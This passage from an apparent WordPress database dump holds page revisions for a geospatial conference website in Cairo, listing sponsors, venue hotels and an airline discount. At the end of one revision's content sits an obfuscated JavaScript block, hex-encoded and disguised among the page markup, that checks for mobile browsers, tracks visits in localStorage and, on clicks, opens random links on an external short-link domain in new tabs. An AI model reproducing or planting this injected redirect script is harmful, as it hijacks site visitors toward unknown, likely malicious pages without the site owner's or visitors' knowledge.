dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-25 16:27:38','2023-06-25 16:27:38','',3066,'https://gsw2023.com/?p=4828',0,'revision','',0),
(4829,4,'2023-06-25 16:28:39','2023-06-25 16:28:39','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687710061920{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" 